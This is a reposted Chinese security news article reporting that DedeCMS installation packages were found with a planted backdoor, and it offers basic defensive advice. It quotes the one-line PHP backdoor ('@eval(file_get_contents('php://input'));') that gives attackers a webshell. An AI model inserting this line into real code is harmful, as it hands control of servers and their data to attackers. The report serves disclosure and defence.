安基网 首页 资讯 安全报 查看内容

织梦CMS建站系统被曝漏洞 几十万网站沦为木马网站

2019-8-2 13:52| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 最新消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。据第三方权威统计数据显示,目前约有 50 万网站使用该dedecms系统搭建,涉及企业、政府机关、媒体机 ...

最新消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

据第三方权威统计数据显示,目前约有 50 万网站使用该dedecms系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。

安全界人士分析发现,此类文件被植入一句后门代码“@eval (file_get_contents ('php://input'));”,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的 WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。

下面小熊优化的小编给出一个相关建议:

1、尽快转换系统,可以使用pageadmin、动易、wp这类保持续更新的cms系统、国内一些老牌的cms包括dedecms,phpcms、jtbc等已停止更新了,建议不要使用了。

2、尽量不要网上下载不知名的插件,尤其使用wp的网站,大多被黑的都是网上乱用插件导致的。

3、保持系统更新,官方更新的版本及时更新上,不要感觉现在功能够用了就不更新,有时候更新不仅仅是功能更新,也是安全上的更新。



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6720387009539490317/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部